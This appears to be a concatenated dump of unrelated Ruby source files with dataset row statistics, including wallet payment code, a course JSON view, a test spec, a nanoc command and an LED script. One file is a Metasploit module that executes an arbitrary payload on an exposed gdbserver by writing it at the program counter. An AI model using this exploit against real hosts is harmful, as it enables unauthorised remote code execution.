# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'tempfile'
require 'openssl'
require 'zold/log'
#
# Operations with a user.
#
class Ops
def initialize(item, user, wallets, remotes, copies, log: Zold::Log::Quiet.new, network: 'test')
raise 'User can\'t be nil' if user.nil?
@user = user
raise 'Item can\'t be nil' if item.nil?
@item = item
raise 'Wallets can\'t be nil' if wallets.nil?
@wallets = wallets
raise 'Remotes can\'t be nil' if remotes.nil?
@remotes = remotes
raise 'Copies can\'t be nil' if copies.nil?
@copies = copies
raise 'Log can\'t be nil' if log.nil?
@log = log
raise 'Network can\'t be nil' if network.nil?
@network = network
end
def pull
start = Time.now
id = @item.id
require 'zold/commands/pull'
Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
['pull', id.to_s, "--network=#{@network}"]
)
wallet = @wallets.find(id)
@log.info("#{Time.now.utc.iso8601}: Wallet #{wallet.id} pulled successfully \
in #{(Time.now - start).round}s, the balance is #{wallet.balance}\n \n ")
end
def push
start = Time.now
wallet = @user.wallet
require 'zold/commands/push'
Zold::Push.new(wallets: @wallets, remotes: @remotes, log: @log).run(
['push', wallet.id.to_s, "--network=#{@network}"]
)
@log.info("#{Time.now.utc.iso8601}: Wallet #{wallet.id} pushed successfully \
in #{(Time.now - start).round}s, the balance is #{wallet.balance}\n \n ")
end
def pay(keygap, bnf, amount, details)
raise 'Keygap can\'t be nil' if keygap.nil?
raise 'Beneficiary can\'t be nil' if bnf.nil?
raise 'Amount can\'t be nil' if amount.nil?
raise 'Payment amount can\'t be zero' if amount.zero?
raise 'Payment amount can\'t be negative' if amount.negative?
raise 'Amount must be of type Amount' unless amount.is_a?(Zold::Amount)
raise 'Details can\'t be nil' if details.nil?
raise 'The user is not registered yet' unless @item.exists?
raise 'The account is not confirmed yet' unless @user.confirmed?
start = Time.now
unless @wallets.find(@user.item.id).exists?
require 'zold/commands/pull'
Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
['pull', @user.item.id.to_s, "--network=#{@network}"]
)
end
if bnf.is_a?(Zold::Id) && [email protected](bnf).exists?
require 'zold/commands/pull'
Zold::Pull.new(wallets: @wallets, remotes: @remotes, copies: @copies, log: @log).run(
['pull', bnf.to_s, "--network=#{@network}"]
)
end
w = @user.wallet
Tempfile.open do |f|
File.write(f, @item.key(keygap))
require 'zold/commands/pay'
Zold::Pay.new(wallets: @wallets, remotes: @remotes, log: @log).run(
['pay', '--private-key=' + f.path, w.id.to_s, bnf.to_s, amount.to_zld(8), details, '--force']
)
end
require 'zold/commands/propagate'
Zold::Propagate.new(wallets: @wallets, log: @log).run(['propagate', w.id.to_s])
require 'zold/commands/push'
Zold::Push.new(wallets: @wallets, remotes: @remotes, log: @log).run(
['push', w.id.to_s, "--network=#{@network}"]
)
@log.info("#{Time.now.utc.iso8601}: Paid #{amount} from #{w.id} to #{bnf} \
in #{(Time.now - start).round}s: #{details}\n \n ")
end
end
| 40.090909 | 101 | 0.663492 |
180233a51ffbd748f9871b9d9a307284e4ea2aea | 3,731 | # frozen_string_literal: true
json.course do
user_role = current_user&.role(@course) || CoursesUsers::Roles::VISITOR_ROLE
json.call(@course, :id, :title, :description, :start, :end, :school,
:subject, :slug, :url, :submitted, :expected_students, :timeline_start,
:timeline_end, :day_exceptions, :weekdays, :no_day_exceptions,
:updated_at, :string_prefix, :use_start_and_end_times, :type,
:home_wiki, :character_sum, :upload_count, :uploads_in_use_count,
:upload_usages_count, :cloned_status, :flags, :level, :format, :private,
:closed?, :training_library_slug, :peer_review_count, :needs_update,
:update_until, :withdrawn)
json.wikis @course.wikis, :language, :project
json.timeline_enabled @course.timeline_enabled?
json.academic_system @course.academic_system
json.home_wiki_bytes_per_word @course.home_wiki.bytes_per_word
json.home_wiki_edits_enabled @course.home_wiki.edits_enabled?
json.wiki_edits_enabled @course.wiki_edits_enabled?
json.assignment_edits_enabled @course.assignment_edits_enabled?
json.wiki_course_page_enabled @course.wiki_course_page_enabled?
json.enrollment_edits_enabled @course.enrollment_edits_enabled?
json.account_requests_enabled @course.account_requests_enabled?
json.online_volunteers_enabled @course.online_volunteers_enabled?
json.stay_in_sandbox @course.stay_in_sandbox?
json.term @course.cloned_status == 1 ? '' : @course.term
json.legacy @course.legacy?
json.ended @course.end < Time.zone.now
json.published CampaignsCourses.exists?(course_id: @course.id)
json.closed @course.closed?
json.enroll_url "#{request.base_url}#{course_slug_path(@course.slug)}/enroll/"
json.wiki_string_prefix @course.home_wiki.string_prefix
json.created_count number_to_human @course.new_article_count
json.edited_count number_to_human @course.article_count
json.edit_count number_to_human @course.revision_count
json.student_count @course.user_count
json.trained_count @course.trained_count
json.word_count number_to_human @course.word_count
json.references_count number_to_human @course.references_count
json.view_count number_to_human @course.view_sum
json.character_sum_human number_to_human @course.character_sum
json.syllabus @course.syllabus.url if @course.syllabus.file?
json.updates average_delay: @course.flags['average_update_delay'],
last_update: @course.flags['update_logs']&.values&.last
if user_role.zero? # student role
json.incomplete_assigned_modules @course.training_progress_manager
.incomplete_assigned_modules(current_user)
end
if user_role >= 0 # user enrolled in course
json.survey_notifications(current_user.survey_notifications.active) do |notification|
if notification.course.id == @course.id
json.id notification.id
json.survey_url course_survey_url(notification).to_s
json.message notification.survey_assignment.custom_banner_message
end
end
end
if user_role.positive? # non-student role
json.passcode_required @course.passcode_required?
json.passcode @course.passcode
json.canUploadSyllabus true
json.requestedAccounts @course.requested_accounts.count if @course.account_requests_enabled?
elsif @course.passcode
# If there is a passcode, send a placeholder value. If not, send empty string.
json.passcode @course.passcode.blank? ? '' : '****'
json.canUploadSyllabus false
end
if user_role == 1 # instructor
exeriment_presenter = ExperimentsPresenter.new(@course)
json.experiment_notification exeriment_presenter.notification if exeriment_presenter.experiment
end
end
| 47.227848 | 99 | 0.76521 |
1a29c54e3d8ee439621aa360b5575853c8fc8fe5 | 518 | require File.dirname(__FILE__) + '/spec_helper.rb'
FEED = 'http://twitter.com/statuses/user_timeline/3922901.rss'
describe MiniTwitter do
before(:each) do
@twitter = MiniTwitter::Feed.new(FEED)
end
it "should exists" do
@twitter.class.should == MiniTwitter::Feed
end
it "should have items" do
@twitter.items.size.should > 0
@twitter.items.first.class.should == MiniTwitter::Item
@twitter.items.each do |i|
puts "#{i.date} --- #{i.title} --- #{i.url}"
end
end
end | 22.521739 | 62 | 0.650579 |
91e817afb7b7fd98653f20a1db9d1aa5b87ef51d | 2,821 | # encoding: utf-8
module Nanoc3::CLI::Commands
class Update < Cri::Command
def name
'update'
end
def aliases
[]
end
def short_desc
'update the data stored by the data source to a newer version'
end
def long_desc
'Update the data stored by the data source to a newer format. The ' +
'format in which data is stored can change between releases, and ' +
'even though backward compatibility is usually preserved, it is ' +
'often a good idea to store the site data in a newer format so newer ' +
'features can be taken advantage of.' +
"\n" +
'This command will change data, and it is therefore recommended to ' +
'make a backup in case something goes wrong.'
end
def usage
"nanoc3 update [options]"
end
def option_definitions
[
# --vcs
{
:long => 'vcs', :short => 'c', :argument => :required,
:desc => 'select the VCS to use'
},
# --yes
{
:long => 'yes', :short => 'y', :argument => :forbidden,
:desc => 'updates the data without warning'
}
]
end
def run(options, arguments)
# Check arguments
if arguments.size != 0
$stderr.puts "usage: #{usage}"
exit 1
end
# Make sure we are in a nanoc site directory
@base.require_site
# Set VCS if possible
@base.set_vcs(options[:vcs])
# Check for -y switch
unless options.has_key?(:yes)
$stderr.puts '*************'
$stderr.puts '** WARNING **'
$stderr.puts '*************'
$stderr.puts
$stderr.puts 'Are you absolutely sure you want to update the ' +
'content for this site? Updating the site content ' +
'will change the structure of existing data. This ' +
'operation is destructive and cannot be reverted. ' +
'Please do not interrupt this operation; doing so can ' +
'result in data loss. As always, consider making a ' +
'backup copy.'
$stderr.puts
$stderr.puts 'If this nanoc site is versioned using a VCS ' +
'supported by nanoc, consider using the --vcs option ' +
'to have nanoc perform add/delete/move operations ' +
'using the specified VCS. To get a list of VCSes ' +
'supported by nanoc, issue the "info" command.'
$stderr.puts
$stderr.puts 'To continue, use the -y/--yes option, like "nanoc3 ' +
'update -y".'
exit 1
end
# Update
@base.site.data_sources.each do |data_source|
data_source.update
end
end
end
end
| 29.385417 | 78 | 0.542361 |
1ddcf35017881bf8b8a1436ed0537c8097c17e6e | 2,170 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Gdb
def initialize(info = {})
super(update_info(info,
'Name' => 'GDB Server Remote Payload Execution',
'Description' => %q{
This module attempts to execute an arbitrary payload on a loose gdbserver service.
},
'Author' => [ 'joev' ],
'Targets' => [
[ 'x86 (32-bit)', { 'Arch' => ARCH_X86 } ],
[ 'x86_64 (64-bit)', { 'Arch' => ARCH_X64 } ]
],
'References' =>
[
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
],
'DisclosureDate' => 'Aug 24 2014',
'Platform' => %w(linux unix osx),
'DefaultTarget' => 0,
'DefaultOptions' => {
'PrependFork' => true
}
))
register_options([
OptString.new('EXE_FILE', [
false,
"The exe to spawn when gdbserver is not attached to a process.",
'/bin/true'
])
])
end
def exploit
connect
print_status "Performing handshake with gdbserver..."
handshake
enable_extended_mode
begin
print_status "Stepping program to find PC..."
gdb_data = process_info
rescue BadAckError, BadResponseError
# gdbserver is running with the --multi flag and is not currently
# attached to any process. let's attach to /bin/true or something.
print_status "No process loaded, attempting to load /bin/true..."
run(datastore['EXE_FILE'])
gdb_data = process_info
end
gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
unless payload.arch.include? gdb_arch
fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
end
print_status "Writing payload at #{gdb_pc}..."
write(payload.encoded, gdb_pc)
print_status "Executing the payload..."
continue
handler
disconnect
end
end
| 27.820513 | 154 | 0.612903 |
ac30c6d5366e568dabfb6313851ab78603f29601 | 179 | require 'artoo'
connection :beaglebone, :adaptor => :beaglebone
device :led, :driver => :led, :pin => :P9_12
work do
every 1.second do
led.on? ? led.off : led.on
end
end | 17.9 | 47 | 0.653631 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.